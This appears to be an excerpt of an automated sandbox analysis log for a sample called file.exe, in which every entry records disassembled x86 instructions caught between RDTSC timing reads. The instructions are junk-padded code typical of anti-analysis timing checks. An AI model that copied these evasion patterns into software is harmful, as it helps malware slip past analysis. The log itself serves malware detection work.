Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C801AE second address: 4C801BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF624B4E7DAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60EE7 second address: 4C60EF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF624C752FEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60EF9 second address: 4C60EFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60EFD second address: 4C60F4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a movzx esi, di 0x0000000d jmp 00007FF624C752FFh 0x00000012 popad 0x00000013 mov dword ptr [esp], ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007FF624C752FBh 0x0000001f xor cl, FFFFFFDEh 0x00000022 jmp 00007FF624C75309h 0x00000027 popfd 0x00000028 mov dx, si 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C40100 second address: 4C40105 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C40105 second address: 4C40139 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FF624C752FDh 0x0000000a adc cl, FFFFFFD6h 0x0000000d jmp 00007FF624C75301h 0x00000012 popfd 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 xchg eax, ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a mov dh, D5h 0x0000001c mov bx, si 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C40139 second address: 4C401A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 1CA73BC2h 0x00000008 mov ebx, 76B1520Eh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 pushad 0x00000012 movzx esi, di 0x00000015 jmp 00007FF624B4E7E7h 0x0000001a popad 0x0000001b xchg eax, ebp 0x0000001c jmp 00007FF624B4E7E6h 0x00000021 mov ebp, esp 0x00000023 jmp 00007FF624B4E7E0h 0x00000028 push dword ptr [ebp+04h] 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007FF624B4E7DAh 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C401A0 second address: 4C401A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C401A4 second address: 4C401AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C401AA second address: 4C401E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF624C752FCh 0x00000009 and eax, 249DD548h 0x0000000f jmp 00007FF624C752FBh 0x00000014 popfd 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push dword ptr [ebp+0Ch] 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FF624C752FBh 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C401E1 second address: 4C401E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C401E7 second address: 4C401EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C401EB second address: 4C401EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C4022E second address: 4C4023E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF624C752FCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C4023E second address: 4C40242 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C40242 second address: 4C40257 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FF624C752FAh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C40257 second address: 4C4025D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60CB0 second address: 4C60CB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60CB4 second address: 4C60CB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60CB8 second address: 4C60CBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60CBE second address: 4C60CE3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, 1D6ACFE1h 0x00000008 mov edx, eax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pop ebp 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FF624B4E7E4h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60822 second address: 4C6085C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624C752FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FF624C75302h 0x00000013 add si, 9398h 0x00000018 jmp 00007FF624C752FBh 0x0000001d popfd 0x0000001e mov ebx, esi 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C606EC second address: 4C606F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C606F0 second address: 4C60703 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624C752FFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60703 second address: 4C60749 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 920Ah 0x00000007 pushfd 0x00000008 jmp 00007FF624B4E7DBh 0x0000000d adc eax, 565C98AEh 0x00000013 jmp 00007FF624B4E7E9h 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c xchg eax, ebp 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FF624B4E7DDh 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60749 second address: 4C60776 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624C75301h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF624C75303h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60776 second address: 4C60793 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624B4E7E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60793 second address: 4C607A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF624C752FCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C607A3 second address: 4C607A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C604A5 second address: 4C604B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624C752FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C7039E second address: 4C703A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C80488 second address: 4C804A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624C75307h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C804A3 second address: 4C804CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, dl 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007FF624B4E7DDh 0x0000000f mov eax, dword ptr [ebp+08h] 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FF624B4E7DDh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C804CC second address: 4C804D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 2612h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C804D5 second address: 4C804F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 and dword ptr [eax], 00000000h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF624B4E7E1h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C804F4 second address: 4C804FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C804FA second address: 4C80549 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FF624B4E7DAh 0x00000008 pop esi 0x00000009 pushfd 0x0000000a jmp 00007FF624B4E7DBh 0x0000000f xor si, AB6Eh 0x00000014 jmp 00007FF624B4E7E9h 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d and dword ptr [eax+04h], 00000000h 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FF624B4E7DDh 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C80549 second address: 4C80565 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF624C75307h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C80565 second address: 4C80575 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pop ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b mov bh, 99h 0x0000000d push esi 0x0000000e pop edx 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C80575 second address: 4C8058B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF624C75302h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60626 second address: 4C6062A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C6062A second address: 4C60645 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624C75307h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60645 second address: 4C6066E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, E9h 0x00000005 mov ah, F5h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e call 00007FF624B4E7E5h 0x00000013 pop esi 0x00000014 mov dx, ACC4h 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C6066E second address: 4C606AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624C752FAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c pushad 0x0000000d call 00007FF624C752FEh 0x00000012 movzx ecx, di 0x00000015 pop edx 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 movzx ecx, dx 0x0000001c popad 0x0000001d popad 0x0000001e mov ebp, esp 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FF624C752FEh 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C606AC second address: 4C606B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C606B2 second address: 4C606B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C80008 second address: 4C8000C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C8000C second address: 4C80023 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624C75303h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C80023 second address: 4C80053 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop ecx 0x00000005 push edx 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b jmp 00007FF624B4E7DAh 0x00000010 mov dword ptr [esp], ebp 0x00000013 pushad 0x00000014 popad 0x00000015 mov ebp, esp 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FF624B4E7E0h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C80053 second address: 4C80062 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624C752FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C80062 second address: 4C8007A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF624B4E7E4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C8007A second address: 4C80096 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 pushad 0x0000000a call 00007FF624C752FDh 0x0000000f pushad 0x00000010 popad 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C802C0 second address: 4C802D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624B4E7E3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CA0673 second address: 4CA0679 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CA0679 second address: 4CA06FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624B4E7DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FF624B4E7E4h 0x00000013 adc ecx, 7D0E5B08h 0x00000019 jmp 00007FF624B4E7DBh 0x0000001e popfd 0x0000001f mov bh, al 0x00000021 popad 0x00000022 push eax 0x00000023 pushad 0x00000024 mov si, 7D77h 0x00000028 jmp 00007FF624B4E7DCh 0x0000002d popad 0x0000002e xchg eax, ebp 0x0000002f jmp 00007FF624B4E7E0h 0x00000034 mov ebp, esp 0x00000036 jmp 00007FF624B4E7E0h 0x0000003b xchg eax, ecx 0x0000003c pushad 0x0000003d mov si, D99Dh 0x00000041 mov cx, 7299h 0x00000045 popad 0x00000046 push eax 0x00000047 push eax 0x00000048 push edx 0x00000049 push eax 0x0000004a push edx 0x0000004b pushad 0x0000004c popad 0x0000004d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CA06FE second address: 4CA070E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624C752FCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CA070E second address: 4CA07CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624B4E7DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FF624B4E7E4h 0x00000011 sub ecx, 3D890488h 0x00000017 jmp 00007FF624B4E7DBh 0x0000001c popfd 0x0000001d mov edx, eax 0x0000001f popad 0x00000020 mov eax, dword ptr [76FB65FCh] 0x00000025 pushad 0x00000026 pushfd 0x00000027 jmp 00007FF624B4E7E0h 0x0000002c or ch, FFFFFFE8h 0x0000002f jmp 00007FF624B4E7DBh 0x00000034 popfd 0x00000035 pushfd 0x00000036 jmp 00007FF624B4E7E8h 0x0000003b sbb cl, 00000048h 0x0000003e jmp 00007FF624B4E7DBh 0x00000043 popfd 0x00000044 popad 0x00000045 test eax, eax 0x00000047 jmp 00007FF624B4E7E6h 0x0000004c je 00007FF696DE198Ch 0x00000052 pushad 0x00000053 push ecx 0x00000054 mov di, D7C0h 0x00000058 pop edi 0x00000059 push ecx 0x0000005a push ebx 0x0000005b pop eax 0x0000005c pop edi 0x0000005d popad 0x0000005e mov ecx, eax 0x00000060 push eax 0x00000061 push edx 0x00000062 pushad 0x00000063 pushad 0x00000064 popad 0x00000065 popad 0x00000066 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CA087E second address: 4CA08A8 instructions: 0x00000000 rdtsc 0x00000002 movsx edi, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push ecx 0x00000008 mov edx, 0729C2C4h 0x0000000d pop edi 0x0000000e popad 0x0000000f ret 0x00000010 nop 0x00000011 push eax 0x00000012 call 00007FF628F95B8Dh 0x00000017 mov edi, edi 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c call 00007FF624C75304h 0x00000021 pop ecx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CA08A8 second address: 4CA08E7 instructions: 0x00000000 rdtsc 0x00000002 mov bx, A6B6h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 call 00007FF624B4E7E7h 0x0000000d mov dx, cx 0x00000010 pop eax 0x00000011 popad 0x00000012 push edx 0x00000013 jmp 00007FF624B4E7E0h 0x00000018 mov dword ptr [esp], ebp 0x0000001b pushad 0x0000001c mov di, cx 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CA08E7 second address: 4CA08F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 mov ebp, esp 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CA08F5 second address: 4CA08FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CA08FB second address: 4CA0901 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C50099 second address: 4C500A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624B4E7DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C500A8 second address: 4C5010A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 1C67AC0Ah 0x00000008 pushfd 0x00000009 jmp 00007FF624C752FBh 0x0000000e or eax, 5FC492AEh 0x00000014 jmp 00007FF624C75309h 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d and esp, FFFFFFF8h 0x00000020 jmp 00007FF624C752FEh 0x00000025 xchg eax, ecx 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007FF624C75307h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C5010A second address: 4C5010F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C5010F second address: 4C50166 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov di, 9E88h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FF624C752FEh 0x00000011 xchg eax, ecx 0x00000012 jmp 00007FF624C75300h 0x00000017 xchg eax, ebx 0x00000018 pushad 0x00000019 mov di, cx 0x0000001c mov dh, al 0x0000001e popad 0x0000001f push eax 0x00000020 jmp 00007FF624C75304h 0x00000025 xchg eax, ebx 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007FF624C752FAh 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C50166 second address: 4C5016A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C5016A second address: 4C50170 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C50170 second address: 4C50221 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx esi, dx 0x00000006 mov dx, D9BCh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ebx, dword ptr [ebp+10h] 0x00000010 jmp 00007FF624B4E7DBh 0x00000015 xchg eax, esi 0x00000016 pushad 0x00000017 pushad 0x00000018 call 00007FF624B4E7E2h 0x0000001d pop esi 0x0000001e mov ch, bh 0x00000020 popad 0x00000021 push eax 0x00000022 mov al, dh 0x00000024 pop esi 0x00000025 popad 0x00000026 push eax 0x00000027 pushad 0x00000028 pushfd 0x00000029 jmp 00007FF624B4E7E0h 0x0000002e sbb ax, 6A68h 0x00000033 jmp 00007FF624B4E7DBh 0x00000038 popfd 0x00000039 call 00007FF624B4E7E8h 0x0000003e pushfd 0x0000003f jmp 00007FF624B4E7E2h 0x00000044 adc esi, 760667F8h 0x0000004a jmp 00007FF624B4E7DBh 0x0000004f popfd 0x00000050 pop ecx 0x00000051 popad 0x00000052 xchg eax, esi 0x00000053 push eax 0x00000054 push edx 0x00000055 jmp 00007FF624B4E7E2h 0x0000005a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C50221 second address: 4C50233 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF624C752FEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C50233 second address: 4C5025E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624B4E7DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov esi, dword ptr [ebp+08h] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FF624B4E7E5h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C5037A second address: 4C5037E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C5037E second address: 4C50384 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C50384 second address: 4C5038A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C5038A second address: 4C5038E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C5038E second address: 4C503CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624C75308h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b or edx, dword ptr [ebp+0Ch] 0x0000000e jmp 00007FF624C75300h 0x00000013 test edx, 61000000h 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C503CB second address: 4C503CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C503CF second address: 4C503D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C40787 second address: 4C4078D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C4078D second address: 4C40791 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C40791 second address: 4C407BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624B4E7DFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF624B4E7E5h 0x00000013 rdtsc
